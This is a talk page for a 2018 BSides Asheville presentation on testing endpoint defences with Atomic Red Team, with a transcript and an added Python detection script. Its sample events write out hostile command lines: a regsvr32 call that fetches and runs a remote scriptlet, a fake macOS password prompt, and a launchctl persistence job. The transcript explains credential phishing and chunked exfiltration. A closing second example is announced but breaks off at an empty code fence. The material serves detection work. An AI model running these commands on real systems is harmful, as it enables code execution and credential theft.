
Testing Endpoint Security Solutions with Atomic Red Team

BSides Asheville · 2018 · 43:16 · 256 views · Published 2019-03
About this talk
A hands-on walkthrough of Atomic Red Team, an open-source project for testing endpoint security solutions. The talk covers building detection capabilities by executing attack techniques, assessing whether security tools actually detect adversarial behavior, and chaining techniques together to simulate realistic adversary workflows.
Original YouTube description
Red Canary https://redcanary.com Recorded at the 5th BSides Asheville Information Security conference on Saturday, June 23, 2018, at The Collider in Downtown Asheville, North Carolina.
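Added example, not from the talk, the slides, or the Atomic Red Team project: a small Python detection pass over constructed EDR-style process-start events that implements the three detections the speaker sketches in the transcript (launchctl with a submit argument, regsvr32 loading scrobj.dll together with an /i: scriptlet argument, and an osascript password prompt spawned from a shell), and makes the talk's "always be testing" point concrete: the order-sensitive regsvr32 rule misses a reordered command line and the content-based osascript rule misses the script-file form, while the resilient and parent-based rules catch both. The event schema (host, process, cmdline, parent), the SHELLS set, the hostnames and the paths are assumptions; the events are constructed, not real telemetry.

```python
"""Detection checks for the techniques the talk walks through, run over a
handful of constructed EDR-style process-start events.  The event schema
(host, process, cmdline, parent) is an assumption modelled on typical
endpoint telemetry, not any vendor's real format."""

from dataclasses import dataclass

# Assumption: a child of one of these is "spawned from a shell", the signal
# the talk points at in the Cb Response process tree.
SHELLS = {"bash", "sh", "zsh", "dash", "ksh"}


@dataclass(frozen=True)
class ProcessEvent:
    host: str
    process: str   # image basename, e.g. "launchctl" or "regsvr32.exe"
    cmdline: str   # full command line as the sensor recorded it
    parent: str    # parent image basename


def _tokens(event: ProcessEvent) -> list:
    """Whitespace-split, lower-cased command line.  Deliberately naive: the
    rules below look for individual switches and file names only, so they
    do not depend on shell quoting being parsed correctly."""
    return event.cmdline.lower().split()


def launchctl_submit(event: ProcessEvent) -> bool:
    """T1152 as the talk frames it: launchctl is noisy (it starts daemons
    all day) but the 'submit' sub-command is rare, so key on the process
    name plus that one token, wherever it sits on the command line."""
    return event.process.lower() == "launchctl" and "submit" in _tokens(event)


def regsvr32_scriptlet_tight(event: ProcessEvent) -> bool:
    """The brittle rule the talk warns against: one exact switch order."""
    return event.cmdline.lower().startswith("regsvr32.exe /s /u /i:")


def regsvr32_scriptlet(event: ProcessEvent) -> bool:
    """Resilient Squiblydoo rule: regsvr32 loading scrobj.dll together with an
    /i: (or -i:) scriptlet argument, in any order, with any extra switches."""
    if event.process.lower() not in ("regsvr32", "regsvr32.exe"):
        return False
    toks = _tokens(event)
    loads_scrobj = any(t.endswith("scrobj.dll") for t in toks)
    has_install_arg = any(t.lstrip("/-").startswith("i:") for t in toks)
    return loads_scrobj and has_install_arg


def osascript_password_prompt(event: ProcessEvent) -> bool:
    """Content rule for the AppleScript credential prompt: fires only when the
    script text (System Preferences plus a password dialog) is visible on the
    command line, i.e. the 'osascript -e ...' form."""
    if event.process.lower() != "osascript":
        return False
    text = event.cmdline.lower()
    return "system preferences" in text and "password" in text


def osascript_from_shell(event: ProcessEvent) -> bool:
    """Behavioural rule: osascript spawned by a shell.  Catches the script-file
    form the content rule misses, at the cost of more false positives, so treat
    it as a hunt/triage signal rather than a page-someone alert."""
    return event.process.lower() == "osascript" and event.parent.lower() in SHELLS


RULES = (
    launchctl_submit,
    regsvr32_scriptlet_tight,
    regsvr32_scriptlet,
    osascript_password_prompt,
    osascript_from_shell,
)


def run_detections(events) -> dict:
    """Map event index -> sorted names of the rules that fired on it.
    Events that trip nothing are omitted."""
    hits = {}
    for i, ev in enumerate(events):
        fired = sorted(r.__name__ for r in RULES if r(ev))
        if fired:
            hits[i] = fired
    return hits


# Constructed sample events (not real telemetry); hosts and paths are made up.
SAMPLE_EVENTS = [
    ProcessEvent("mac01", "launchctl",
                 "launchctl submit -l evilpython -- /usr/bin/python /Users/alice/notevil.py", "bash"),
    ProcessEvent("mac01", "launchctl",
                 "launchctl load -w /Library/LaunchDaemons/com.example.agent.plist", "launchd"),
    ProcessEvent("win01", "regsvr32.exe",
                 "regsvr32.exe /s /u /i:https://example.invalid/file.sct scrobj.dll", "cmd.exe"),
    ProcessEvent("win02", "regsvr32.exe",
                 r"regsvr32.exe /u /s scrobj.dll /i:C:\Users\bob\file.sct", "powershell.exe"),
    ProcessEvent("win03", "regsvr32.exe",
                 r"regsvr32.exe /s C:\Program Files\Vendor\vendor.dll", "msiexec.exe"),
    ProcessEvent("mac02", "osascript",
                 "osascript -e 'tell application \"System Preferences\" to activate' "
                 "-e 'display dialog \"Enter your password to make changes\" default answer \"\" with hidden answer'",
                 "bash"),
    ProcessEvent("mac02", "osascript", "osascript /tmp/prompt.scpt", "bash"),
    ProcessEvent("mac03", "osascript",
                 "osascript -e 'display notification \"Backup finished\"'", "loginwindow"),
]


if __name__ == "__main__":
    for idx, rules in run_detections(SAMPLE_EVENTS).items():
        ev = SAMPLE_EVENTS[idx]
        print(f"{ev.host:6} {ev.parent:>15} -> {ev.process:13} {', '.join(rules)}")
```

Running it shows the reordered regsvr32 command line (win02) tripping only the resilient rule and the script-file osascript call (second mac02 event) tripping only the parent-based rule; every rule here is a starting point to keep re-testing against new permutations, as the talk's test-build-test loop prescribes.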
Transcript [en]

All right, hey, how's everybody doing today? Doing good? Good, thumbs up across the board, that's good. This is usually like nap time for a lot of people, so glad everybody's still awake. So thank you guys for coming out today. We're going to be talking about testing security solutions with Atomic Red Team. It's an open-source project we started about a year ago, you know, a little bit less than that I guess, but we'll get into that in a little bit. So who am I? Not super important. There's a few of my favorite things. I have been doing security things for a decade-plus, really focused on a security role for like the last eight-ish years, doing a lot of different stuff: vulnerability management,

assessments, penetration testing, security engineering, architecture, all that good stuff. Right now I work for Red Canary. I'm an incident handler with them, so we do consulting, we do obviously incident handling, but they were nice enough to let me steal their slide deck, so you'll see the bird in the corner. All right, so what we can talk about today. So first of all we're going to talk about testing, why it's important, and some of the common roadblocks to organizations being able to test effectively. And then once I talk about how bad the testing situation is today, we'll get into some more fun stuff: a proposal for how to do it better, give you some tools so you

can go home and start doing this immediately. So let's look at the current state of the SOC. Obviously this is kind of a generalization, so your organization might be much better or much worse, but having worked with a lot of different organizations of different maturities, different, you know, technology stacks, this is kind of what we see consistently. So you have things. So we have security tools: you have your SIEM, your IDS, your IPS, you have, you know, your AV, you have your next-gen AV, you have your next-next-next-gen AV, all this stuff. Then you have your controls, so these are like your, pardon, systems, these

are the things you put in place so that users can't be users. And then your policies, you know, so things on paper people are not supposed to do and mostly they do anyway. So you have those things and you expect them to do things: you expect them to prevent evil and to assemble your incident response team like Voltron, and if APT gets past your, you know, impenetrable fortress you want it to be evicted, nuked, you want their families to suffer. So that's what you expect from your stuff. But truthfully, a lot of organizations have significant investments in their security programs and don't actually know if they work. So let's talk about

how we got here. How do we build these big programs that we're not sure about? So we build things because it's good security, it's best practices. You saw there was a gap, you went out and you filled it, you made sure that you were taking care of all the different places people could get in. If there is a piece of tooling you needed to, you know, get some additional visibility, you went out and tried to get it. Sometimes compliance, sometimes, you know, some governing body says, hey, you have to have this thing, even though you don't think it's particularly effective, you have to have it. And so therefore, you know, if you'd like to know that it's

working the way it's supposed to. And expectations: so I'm sure a lot of you have had a manager or some C-level that went to RSA and came back and said we have to have browser isolation, or next-gen all the things, and you're like, okay, so because Gartner told him to, you're expected to have these things. I've talked to organizations and it's like one guy, he's the director of everything, and he's like, yeah, you know, I'm really thinking that I'm gonna go for a SIEM next. Like, really? Because you're doing like operations and incident response and security operations, you're doing all the things, you don't have time for any of that, so what are you going to build, maintain and

actually get value out of a SIEM? But that's what he's supposed to get, that's the next checkbox for him. So, you know, people accumulate things they can't actually use. Yeah, it happens, man, I totally, I've been there. So now that we have all of these things, we have the best prevention, the best detection, the best visibility, the best workflows, all of our teams are like really fine-tuned machines working at maximum efficiency and capacity, right? Right? Everybody feels that way about the stuff they have. So let's see how you feel if you think about the organization that you work with, work for, the security that you have. Like, do a true assessment on

efficacy. So you've got a lot of security. Are you confident that it's doing the things that it's supposed to do? Maybe you believe everything is working the way that it's intended to work. You hope everything is working the way it's intended to work. But as everybody knows, hope is a feeling, not a strategy. You cannot just hope that all of your security is working, because you will get breached. All right, so how do you know it's working? You test it, right? You just have to. If you want to know if something's working, if you want to know if a car was going to start up, you turn the key, right? So you test it, see if it's gonna work. So you have to know that your

stuff works, and if you are not testing your controls, rest assured someone else is. You may or may not know it. Yes, they're doing it for free and they're gonna give you a bad day one day. So how do we test? Like, we know testing is important, and so how do we go about doing it? There's a couple of different ways the testing, you know, happens today. So if you're going out and you're looking at some new piece of technology and you ask the vendor like, how do I know that you're doing the thing you're selling me, of course they're going to say, hey, no worries,

we'll help you test this. So mostly their tests are going to play to their strengths and sometimes they're already rigged. If you ever hear of a vendor who doesn't let you test their software in an open forum, like if only approved vendors can do tests on their product, run, run from that. I worked for a company, we were testing like an email malware solution, and the guy came in, the SE, he came in and he was like, yeah, this thing's so awesome, so awesome. I say, okay, cool, so how are we gonna need to test this? He's like, I guess you give me an email address and we're gonna send you malware at that email address and you

can see how good the tool is. Like, okay, buddy, I'm glad that your tool can catch things one for one in your curated list of malware, like that's great, but that doesn't necessarily mean it's gonna catch everything. So that's not necessarily a good way to do it. You could try to build your own test plans, but it's kind of hard to get started. Like, how do you know what are the right things to test? How do I take a piece of security tooling or take a control and test it and see, like, is it working the way it's supposed to? Is it actually doing the thing? And then how do you

scope and track your progress? Like, if you wanted to test AV, are you just going to go download all the malware? Like, where do you stop? Like, how do you know how many samples to test before you know you've tested it all? So a common approach that people use for testing is to hire an external red team. There's problems with this. Usually it's a compliance checkbox for a lot of organizations, so somebody at the top knows that they have to have a piece of paper that says this is a penetration test so that they pass their audits. That's usually not a great way to do it, because, you know, the engagement is

usually all about, okay, hey, just come in, do some stuff, give me a report and then you're good. A lot of times the boots-on-the-ground guys don't even get to talk to you, like, you know, give them some requirements, hey, test this, test this. They just kind of end up with what they get at the end. Not all teams are created equal. John Strand has a term called pentest puppy mills. So it's organizations that will come in and they will scan your environment with Nessus, they will put it in a very nice Word document, and that is it. I'm sure some of you have probably seen that, and if you haven't, I

hope you don't. But, um, so there, I mean, there's some great teams out there, some great guys, like, you know, obviously, you know, Loras is here, you know, the Mandiants, the SpecterOps, the Black Hills, all those. There's a lot of really good organizations out there, but they are hard to get. You have to usually schedule them far in advance. It's hard to get them to come in on a regular basis, and also it's expensive. You probably can't justify the cost of bringing in a top-tier red team over and over again like you would need to to get good, consistent, iterative testing. Sometimes there's scoping problems, especially in those compliance checkbox

situations, because basically they say, come in and hack us, you know, somebody who's not really in the know: come in here, just assess all my things. And so, you know, they just come in, they go for domain admin, they probably get it, but they're just gonna take the shortest route to get there. They're not necessarily going to test all of your controls. And there's long trip times: you may have a test year one and then they give you some findings and you go out there and you make sure that's all covered, and then maybe you have a recertification test, maybe they come back in a couple months and make sure it's actually secure. Usually you have to

wait till the next year. You know, if you're one of those organizations fortunate enough to have quarterly pentests, then, you know, that's a little bit quicker, but still not fast enough. So what's the solution? Do we build our own red team that can do this all the time? That's a great idea. I mean, so penetration testing is one of the top 20 CIS controls, but it's number 20, so it's towards the end of that, but it is very, very important. But the problem with this is, do you have, first of all, do you have the interest? Is there somebody in the organization that's like, I really want to

do this, I'm really like psyched up to do this? Pentesting is hard. Like, to actually learn all the techniques, learn the different tools, really put in time, like you're talking about work time and at-home time. It's a commitment, it's hard. Do you have someone who's willing to do that? And if they are willing to do that, do they have any skills already, or is this going to be a very long ramp-up time? Is your organization mature enough to even be considering this? Like I said, it's an important control, but it is number 20. Do you have your admin rights in order? Do you have patching in order? Do you have

all those other fundamentals that you should truthfully have in place before you decide to go and build a red team? And do you have time? Does your person who's interested and has some of these skills, are they also your firewall, you know, engineer? Are they also doing about six or seven other things that they're going to have to put on hold or find other time for? So that's tough. Also, if you wanted to go out and hire somebody, these skills are in high demand and they're very expensive. So you have to go find somebody, probably remote, unless you, you know, happen to live in a wonderful mountainous city like Asheville, because people love this place and would come

here. But a lot of other cities, like I live in Columbia and nobody wants to be there, so remote is the only option. And it's difficult to maintain objectivity. If you've ever done any red team exercises in your own organization, you pretty much know where the holes are, you know how to get your target pretty quick. And also, like, if you see the same systems day in and day out, how do you really go about, okay, now I need to go and target this system, and now maybe this system? It's kind of like a game of whack-a-mole. You just, you know, you already have so much

intimate knowledge, you might think a system is like totally tight and there's nothing that can be done to it, so you don't even look at it, and there might be glaring vulnerabilities or holes in your visibility. So, so we know it's secure. If we know that testing is important, and we know that outside of a few less-than-desirable options most organizations really aren't testing at all, how do we fix it? We need ongoing iterative testing. We need a very fast test-build-test iteration loop. So we need to be able to test something, we need to be able to build a detection or a prevention, and then we need to be able

to test again to make sure that we've got it covered. We need objective measurements. We need some kind of framework or roadmap that takes us from point A to point B to point Z and everywhere in between. And we need a low barrier for entry. We need this to be something that someone who is doing about three other jobs can pick up and do without having to do a lot of, you know, installation of third-party tools and frameworks, and like gear up on those, and now all of a sudden, like, you're spending a ton of time, you have a tool, it maybe does a handful of tests, and you're not sure if

you've spent your time wisely. Pause for dramatic effect: Atomic Red Team. So this is an open-source project that we created, like I said, about a year ago. It is comprised of discrete unit tests, which I'll kind of cover a little bit in a minute, and those are mapped to the MITRE ATT&CK framework. Now some of you who are familiar with MITRE ATT&CK might be saying, MITRE ATT&CK, so hot right now. MITRE ATT&CK is everywhere, everyone's talking about ATT&CK. You know, so many frameworks are built around ATT&CK, there's webinars, they've got all kinds of stuff, but it's great. So if you've never heard of ATT&CK, what MITRE has done is they have catalogued a

treasure trove of TTPs, tools, malware, like all these different tracked groups. They've kind of put together their techniques, their tactics, the tools that they use, and they've put them in a vendor-agnostic form out on the web where everybody can use it, which is great, because now you don't have to go by, you know, FireEye's nomenclature or go by, you know, company X's nomenclature. Like, we can just talk about this as defenders in a common language. So it's really cool. What's that? I know, who would have thought that collaboration would be a good thing? So ATT&CK really focuses on the end of the kill

chain, so the post-exploit portion, so looking at the persistence mechanisms, the way that adversaries escalate privilege and execute software, you know, malware, how they move laterally. And I'm not sure what the MITRE-approved reasoning for why they did this with ATT&CK would be, but in reality, if you think about it, you could look at everything to the left of this little bracket and you're like, okay, well now I need to find, I need to be able to like detect and prevent all of these things. So detecting exploitation, especially in, you know, the day and age of zero-days, is pretty hard, because there's a lot of different ways to do it. There's software being owned

today that's never been owned before, and that's going to continue to be the case, and it's going to be tough to stay out in front of that. However, comma, once an adversary lands on a system, the things that they do, I mean, they're creatures of habit like the rest of us, so they persist in very consistent ways, they move laterally in very consistent ways. There's a less-than-infinite number of things that they can do on the system, and it makes it a little bit easier for us to track it. As an example, from earlier when the gentleman was talking about, you know, TrickBot and ransomware like Locky and all that good stuff, so

ransomware can be delivered in a large number of ways. It's kind of hard to plug all those holes. However, they usually delete your shadow copies the same way every time, so if you monitor for that, you will have very early knowledge that there's something like that going on, and that's consistent across a lot of those malware families. So this is a screenshot of the Atomic Red Team. It's changed a little bit, we've made some recent adjustments that I will cover kind of towards the end, but essentially, you know, we have a big pile of markdown files that kind of give you your little copy/paste test that you

can do. We've got a lot of other stuff in there as well, which we'll cover, but this is kind of the meat of it. So for each platform MITRE has come up with a matrix covering how they get initial access, execution, persistence, privilege escalation, obviously it keeps going, and there's all of these different techniques for each one of those tactics. So each one of those, if you follow the hyperlink, will take you to a test that you can test, see, do I have anything that will prevent this, detect it, you know, so that I can check it off my box and go along. So why do we do this? So I mentioned testing is very important,

we wanted to lower the barrier for entry. This is something that you can do with copy and paste. We want small, targeted tests, so if you're from the programming world, you know, like, unit tests is the smallest viable test of a unit of, you know, something you want to play with. So in this case we take a technique and we distill it down into its smallest possible form so that you can take it, run it and see if anything happens. So that's kind of the idea there. And then of course we just really did this because we want to make as big an impact

on as many security organizations as possible, I think the most evil, because we're all in this together, you know, this is us versus the enemy. So this came out of kind of a bunch of people that had kind of similar ideas: how do we make this testing thing work for a lot of people? Mike had this silly-named bookish happiness repo at one point that had kind of the prototype that eventually became Atomic Red Team. So it's been around for a while. We were working on it pretty heavy last summer, and then towards the end of summer we came out and made it public. So now we're going to look at how it works,

and so this is probably a good time for me to tell you that I don't think there's enough emphasis on research in security, you know, I have Sauron on the Mac and Linux world, so a lot of these are going to be Mac and Linux. There's a few Windows ones, there's at least one in there. But, you know, I'm just going to kind of cover a couple of techniques, show you what they look like, show you how to execute those from Atomic Red Team, and then show you how you could build a detection capability around that, so kind of operationalizing it very quickly. So this is AppleScript. If you're not familiar with AppleScript, it has some

comparatives to PowerShell. It's kind of how programs in the macOS ecosystem talk to each other. You can use AppleScript to tell one application to do something, you can have it run shell scripts, you can have it do any number of things. It can actually talk to another system through SSH. It can do a lot of evil things, and for the most part it's just allowed to run on all systems. So there are some mitigations you can put in place and make sure that no unsigned scripts can be run, but, you know, for the most part it's something that needs to be looked at and probably isn't. So this is the blurb from

MITRE. If you go to ATT&CK you will see this, and this is kind of what it looks like in Atomic Red Team, at least at the top, so this is kind of, we pull it in from ATT&CK so that you don't have to go and, you know, do a bunch of research on what the thing is. And here's the actual test. So in this case what we've done is we've taken the Empire launcher that uses AppleScript, and you can only see kind of part of the execution there, but do shell script does exactly what you think it does. So AppleScript says, hey, shell, I want you to run this command. It passes it

to bash and then bash does the thing, which is pretty awesome. Yes? So the question was, is this done at the user's privilege level? It is, and there are ways to escalate that which we'll look at in a minute. So, you know, after seeing one of those, this is a good time to kind of cover the detection building lifecycle using Atomic. So you test a thing: you take that little blurb from AppleScript, you put it into your terminal, you run it, and then you say, okay, did I detect this? Did anything go off? Did I have, you know, an EDR alert? Did I have a SIEM alert? Did I have anything on

my system that said, hey, there's something bad going on here? If you did, that's great. So now you still have to keep testing. There's lots of different ways to run each one of these techniques, so you can't just check it off your box and never come back to it. If you didn't detect it, then you have a couple of different things you have to look at. Do you have the underlying telemetry? Is there any kind of raw data on any one of your systems that would have given you this? If there is, that's easy to build a detection capability out of, so you can take that and say, okay, now I'm going to build this SIEM correlation rule, or I'm

going to build XYZ so that next time this happens all the alarms go off and we know that there's something we have to look at. And it's important to kind of mention we want to build resilient detections, and I'll kind of cover that when we look at some of the detection building. But you'll notice that everything comes back to testing again. So everything goes back to testing so that you're always looking at different permutations of the technique, so that something doesn't get slipped by you just by a piece changing the command line a little bit. If you did not have any underlying telemetry to build a detection capability, it's a great time to say, okay,

maybe I need Sysmon, or maybe I need some other tool that will show me this thing. And, given, you know, whatever technique you used, maybe you need something that gives you command line, maybe you need something that has better network capability, you know, maybe there's too many NATs in your network and you need something that's closer to the host to tell you which host actually made that call out. So another different technique. So this is T1152, launchctl. So this is a command-line utility that works with launchd in macOS. It's cool, mostly it's there for starting daemons up, stuff like that,

but you can also submit jobs. So for instance, if you wanted a persistent calculator that every time you closed it, it came back, you would do that with launchctl, which is cool. That's maybe not super useful from an adversarial standpoint, but like if you always want to make sure that you had a calculator at your hand, that's a good command to use. So if we wanted to take this little command from Atomic Red Team and build a detection capability, let's see what we've grabbed. So launchctl, if you look in your environment, if you have any macOS devices, you're probably going to see a lot of it, because like I said it's

starting up those daemons, it does a lot of things under the hood. What it doesn't do a lot is submit new jobs. That's very rare. So it's a good thing to look at to see if somebody is putting something that's, you know, at least somewhat persistent. It doesn't survive a reboot, which makes it really good for, you know, trying to accomplish a task while the user is logged in and then completely wiping itself out of existence when they reboot. So in this case we could just look for a process name of launchctl with a command-line argument of submit, and that would kind of give you something to look at there.

So this is an output from Jonathan Levin's tool supraudit. If you have any Mac devices you might be lamenting the fact that there's not a lot of open-source or free utilities to, you know, kind of get good data from them. This is an excellent tool, and he actually just added syslog to the capability, so you can syslog straight out from this utility. It's really, really cool. I put the URL down there. So what does this look like if you don't do it with Calculator but instead you decide to do something a little bit more nefarious? This is the part in the talk where I talk really slowly so you don't

notice how slow I'm typing in the terminal window, because it takes longer than I would like it to, but I was too lazy to recapture it. So what we're doing here is, so launchctl, I'm submitting, the label is evil Python, which gives you an idea of what it is, and then I am just going to point to a Python script, and that is notevil.py. And so in this case it's just a little box that pops up that says Python code is executing on your machine. Most adversaries will not do that, that's just something I did for you. So I closed it and you notice it came right back, and

I'm going to close it again. You see the script is actually done down there, it's on an empty terminal prompt, but it will keep coming back. So if somebody is running a hidden Python script that is doing, like, collecting information on your system, it's running some other utilities, waiting for a user to go to a certain website, it could just sit there, and they could actually see the Python running, kill it, and think they're good, and it's gonna come right back. So it's an interesting technique. So look at, so here's one for the Windows guys. So regsvr32. This is related to a technique that Casey released some time ago which he named Squiblydoo, which I included

because I like to say Squiblydoo. So in this case, you know, from the Atomic Red Team, you know, we have a couple of different options for it. So we have ways to execute a COM scriptlet locally. regsvr32 is also internet- or network- and proxy-aware, which is really nice of Microsoft to make it, like, go right through your proxy and pull a random SCT file from anywhere on the internet and then execute it. It's really nice. Yeah, oh yeah, it's great, oh yeah. So yeah, it's really good at executing arbitrary code, which is not, I don't think, the intention of the utility. But so there's three different tests we have there. Only really kind of the top one

is referenced, but there's a couple of variables, so you can, you know, pass it your filename and that's where you would execute it. If you go down, that shows you an example if you want to host something on GitHub in a gist, you could do that as well. It's very flexible. And this is kind of what the command line looks like. So if we were going to build a detection capability out of this, we would want to build something that would at least cover regsvr32. The /u and the /i are the major components for executing that SCT file, that COM scriptlet. The u is

unregister and i is the location of the file you want to execute, and then scrobj.dll is a script object dynamic library. So at the minimum you would probably want to look for regsvr32 and scrobj.dll. You could probably grab a couple of those others as well, but you don't want to make it too tight. Like, you don't want to take this and then just drop it into an alert, because all they would have to do is make a couple of changes, you know, maybe reorder some of these switches. You know, so you want to make sure that you are

widening your net as wide as possible without killing yourself with false positives. All right, so now we're back to my friend AppleScript. So the gentleman earlier mentioned, you know, all this is happening under the user's context, and it's true. If you execute an AppleScript, you know, under a shell that's owned by a certain user, it will execute in their context. However, comma, you could get some really cool information, especially if they're an admin, and in a lot of organizations, like, people don't want to deal with Macs, so they just make their owners admins, which is cool for privilege escalation. So here is an input prompt. So osascript just tells the System Preferences application to

activate and then put up a box that says, hey, we need to get your password to do some changes, and we all know that users love to give their password to boxes, so they're going to type their password in here, that's just going to happen, and they're gonna hit okay and then it's going to go away, just like it's supposed to, like it would normally if that was a legitimate system prompt. And then what that's going to do is it's going to give it to the adversary that executed the AppleScript, and now they can escalate privilege, now they can go to root, and now they own the machine. So kind of a cool one.

The cool thing about this is, like, in Windows there's a lot of utilities that can pop up a box and kind of get users to give them their passwords, I mean, a lot of times they look kind of janky, like they don't look legit. This AppleScript, like, the way that these boxes are popped up and the way that they're built, most legitimate software uses them in the exact same way, so this is a very legitimate-looking box to a user. So if we were going to try to build some kind of detection capability, we could take this, grab a couple of sections from it, maybe look for osascript and System Preferences, maybe just

look for the password. I've seen a couple of legitimate tools, legitimately built tools, that will ask for the password in this exact same way, which is training the user to give their passwords, totally. But so this is something you might see in legitimate software as well, but if you ever see this spawn from, like, a bash shell or something like that, there's a good chance that there's something sketch going on. And there's just, like, a little process tree from Cb Response down there in the bottom just kind of showing you what that looks like at the host level. All right, so this is great. So if you

built a detection capability based on this probably going to catch this but you can also execute the exact same thing with a shell so you can you could just pass a couple of arguments call Apple script give it some arguments and the same box that's going to pop up but you're not going to find it with your the detection capability you built in the last slide so the idea don't forget your ABT's always be testing so remember that that loop tests verify build go back test again and then you know keep coming up with different ways to do the same things so we're pretty good for the one for once right so let's let's level up so we have

this concept in atomic red team called chain reactions it's kind of our way of showing you how to change some of these things together in a meaningful way it's like putting Legos together because we give you all the Legos now you have to do is drop them into a script of some sort and now you have a much more robust test you're testing multiple things at the same time this is you know a little bit more advanced so if you feel like you've got things pretty well covered this is a great way say okay an adversary would normally start doing some recon maybe they're going to shove some stuff into a file they're going to

try to exfiltrate it. So that's kind of what we're trying to simulate here. So if you were going to generate a chain reaction, start with a basic script, you start picking things off the shelf, grab a little bit of techniques here, a little bit of techniques there, grab something from every column, and then execute them, see what you find. So I'm going to show you a chain reaction that I built some time ago called Ranger. So what we're looking for here is we grab some stuff from defense evasion, a lot of stuff from discovery, so this is really kind of simulating an adversary in the recon phase, so they're trying to find out what's going

on in the system, you know, who the users are, what privileges they have, and then it's going to prep everything for exfiltration. So let's look at it. It's really just a shell script. Please, when we get into the code, please don't laugh at me, because I'm not an excellent shell scripter, but it works, which is really all that matters to me. So here's a little bit of the code. You can see I just kind of grabbed... this is actually Mac/Linux aware, so if you run it, you can run it on either one, it will figure out what system it's on and do one set of commands versus another. So it's just really grabbing

some information from users and groups, dumping those all to a text file in a hidden directory. As you get towards the bottom, what it's going to do is zip all of those up into an encrypted archive, and if you don't have command capabilities you're not going to see what the password is, so you might not really ever know what came out of there. So we throw all those into a zip file and then we bust them up into a bunch of 23-byte pieces, and the reason that you would want to do that as an adversary is because now you can very easily exfiltrate without setting off any kind of NetFlow alarms. Just say, hey,

every so often, send another one of these pieces out until they're all gone. So it makes it very tough as a defender to see that stuff. (Audience: yeah, especially when they're in random or...) Exactly right. And this is just kind of what this looks like when you get to the underlying EDR view, so you can see the shell spawning all kinds of things. These are also, interestingly enough, things that admins do all the time. Recon is really hard to find because it looks like legitimate activity, so that's why you want to have enough detection capability so that you're looking for each one of these techniques, and then when you see a lot of

them clustered together on a system, it's like, I could see somebody running a couple of these sudo commands, these whoamis, but when you start putting all of these things together, now it's very sketch, now there's a good chance that there's somebody that's trying to get information on your system. It could be a new employee, that's right, and then they think that you're some kind of spy. All right, so we're beyond chain reactions, let's actually put these tests together with some kind of purpose. So we're looking at APT simulation, and so MITRE is nice enough to track all, you know, they put all these groups that, you know,

FireEye and all these other, CrowdStrike, these organizations have tracked and, you know, attributed tradecraft to, and then they say, hey, you know, APT32, they like to use these techniques, they like to use these tools, and that helps us build a chain reaction that is focused on adversary simulation. So first of all, evaluate your threat model. Know where you work, know who your enemies are, know the tradecraft they use. You could go out there and look at 40 different groups and build a whole bunch of scripts that test a bunch of techniques, and they might not be representative of the people that actually want to come

into your house. So know who your enemies are, and then you can just go straight to MITRE, get some stuff, and say, okay, now I'm going to mimic this actor. So we have a chain reaction called the Dragon's Tail, and it's based off of tradecraft from APT32, also known as OceanLotus, out of Vietnam, or at least they're supposed to be out of Vietnam; attribution is hard. So grab a couple of techniques there from the bottom. Obviously they do a lot more, you can see there's some Cobalt Strike stuff in there, but we're going to focus on a handful of those at the top. So this is what we called the

Dragon's Tail. You can see a section of the code there. So we're emulating, you know, APT32's known for setting up scheduled tasks using the Squiblydoo technique that we saw earlier with regsvr32, so you can see up there at the top the scheduled task is being created with that particular script, it runs off the page, and what it's going to do is it's going to pull down an SCT file and then execute it. I believe that one executes calculator. The enemy is probably not going to pop calc, but at least you'll be able to see what it looks like. And then we like to clean up after ourselves, so

we'll delete the scheduled tasks, and for the most part these are all supposed to be safe, but obviously evaluate what you're running on your systems. Don't trust me, I might lead you down the wrong path. I'm not in this case, but I could. So a note on simulating APTs. So Nick Carr mentioned at one point, I don't know if it's possible to authentically simulate the best APT groups, because they have all the budget, they have all the time, they have all the resources, so they can come up with new, you know, breaking tradecraft every day. But don't let that, or, you know, tweets like this, discourage you. Obviously not real, but don't

don't let that discourage you. If you can get as close as yesterday to nation-state, like, you're an apex defender, like, you are defending at the highest of levels. So, dude, don't look at it like, I'm never going to catch these guys, so why even try. We have the tradecraft, we know what they do, so why not put it to your advantage, build some rules, because what you'll catch is you'll catch the guys above the script kiddies, the guys that are trying to use some of the same tradecraft but not necessarily with the same goals. (Audience: exactly, you don't need to outrun the bear, just outrun the person.)

Yeah, make yourself not an easy target, that's a great way to put it. Somebody else will be a lower-hanging piece of fruit than you. So what's next, what are we working on next? Actually, probably more like what's now. So one of the things that we've been working on, and have just released some new goodness in Atomic Red Team, is we have YAML-ized all of our tests. So YAML is yet another markdown language, and basically what we're trying to do here is make these portable and make them executable from other frameworks. So, you know, Chris Gates has Metta, there's APT Simulator, there's a bunch

of different utilities that are already set up to consume different techniques and then execute them. So we want to make it easy, we wanted to make it really simple to just say, hey, everyone can just consume from us, treat our tests like Metasploit modules. We'll just put them all out here and you guys execute them on whatever framework you want. So that's what we're working on right now. I believe everything, all of our techniques that are out there now, have a YAML equivalent, and then those are the ones that actually spit out the markdown. So on the right there, Lee Holmes was nice enough to build some PowerShell automation, which

we're still tweaking a little bit to work with the new YAML format. So we're working on a couple of different fronts. Definitely, this next slide is very important: definitely feel free to come and join us and help build some of these things. There's a lot of techniques that we don't necessarily have covered yet, but we need better coverage. The great thing about this, if you've ever wanted to get into open source development or contributing to open source projects, it takes about 15 minutes to research one of these techniques, find somebody who has done something like this, and then make your own test. So find somebody else's

research and say, okay, I'm just going to make a very simple test to test this one thing, and then submit. And we have a Slack that we just created not too long ago. We've got some really bright people from the industry in there, be biking KC, some other folks from our organization, we're all hanging out in there so we can help you start using this: atomicredteam.io. There's also some other materials in there so you can get started. But yeah, please come, it's probably one of the lower-drag ways to get involved with open source, and obviously if you have any questions you

can email us at research at Red Canary, those are all of our Twitter handles, and atomicredteam.com is actually another site that has all the historical blog and webinars that we've done, some blog posts and a lot of workshops, so that you could get started with this and actually start using some of these techniques. So, I've been talking for a long time. Any questions? (Inaudible question.) Sorry, so the question was, what are our priorities in the project now? So Mac and Linux need love. Mike and Mike and Casey are great at coming up with a lot of different ways to do things in

Windows systems, but we definitely need some more love. Windows has so much love; the Unix guys need some love. And those are actually some of the easier techniques to employ, because a lot of it is just coming out of a shell script, so it kind of lends itself to easier testing. So good question, thank you. Anyone else? Thank you guys.

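As an added example (mine, not the speaker's, and not code from the Atomic Red Team project), here is a small Python detection pass over constructed EDR-style process events. It encodes the two detection ideas the talk keeps coming back to: the osascript password dialog is only interesting when a shell is the parent, since legitimate apps pop the very same box, and individual discovery commands look like admin work but several distinct ones clustered on one host in a short window do not. Every host name, timestamp, parent-process name and command line is constructed; the parent names and the dialog syntax are my assumptions about what such telemetry looks like, and the window and threshold are tuning assumptions, not values from the talk.

```python
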